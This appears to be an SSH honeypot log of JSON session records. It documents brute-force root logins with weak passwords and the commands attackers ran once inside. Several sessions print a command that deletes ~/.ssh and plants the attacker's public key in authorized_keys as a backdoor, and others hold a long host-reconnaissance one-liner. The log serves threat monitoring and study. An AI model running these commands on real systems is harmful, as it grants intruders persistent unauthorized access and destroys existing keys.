"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 111111
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "3f3be77fe727",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:42:50.363476Z",
"end_time": "2026-06-30T16:42:51.641465Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "111111"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "5aa0ee8869b1",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:41:16.259291Z",
"end_time": "2026-06-30T16:41:17.295477Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "fb19f4ddb2b0",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:41:14.167282Z",
"end_time": "2026-06-30T16:41:16.108848Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Ss@123456
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "0b8ad1892687",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:41:11.484770Z",
"end_time": "2026-06-30T16:41:17.290768Z",
"duration": "5.8",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Ss@123456"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / !root
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "ecd0b3832ce9",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:39:38.042078Z",
"end_time": "2026-06-30T16:39:39.332934Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "!root"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "bac7c1cee115",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:38:28.260571Z",
"end_time": "2026-06-30T16:38:29.136577Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "718dcb3a39e2",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:38:26.280393Z",
"end_time": "2026-06-30T16:38:28.134386Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Pw@123456
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "e723426a4c04",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:38:24.395022Z",
"end_time": "2026-06-30T16:38:29.133633Z",
"duration": "4.7",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Pw@123456"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "de5151ad2592",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:35:18.005638Z",
"end_time": "2026-06-30T16:35:19.053001Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "b877f4cb4b4c",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:35:16.010373Z",
"end_time": "2026-06-30T16:35:17.863995Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Qaz147369
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "14149db9f003",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:35:13.985100Z",
"end_time": "2026-06-30T16:35:19.056101Z",
"duration": "5.1",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Qaz147369"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sftpuser
{
"id": "a530f7646f9c",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:32:02.916639Z",
"end_time": "2026-06-30T16:32:04.747641Z",
"duration": "1.8",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "sftpuser",
"pass": "12345"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: user / 3245gs5662d34
{
"id": "047f1819bee4",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:30:42.850449Z",
"end_time": "2026-06-30T16:30:43.925583Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "154d8b0e54b5",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:30:40.626685Z",
"end_time": "2026-06-30T16:30:42.681863Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: user / asdfg
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "506f7dbd9f03",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:30:38.362207Z",
"end_time": "2026-06-30T16:30:43.922533Z",
"duration": "5.6",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "asdfg"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "609a714de5ac",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:30:32.208154Z",
"end_time": "2026-06-30T16:30:32.375911Z",
"duration": "0.2",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
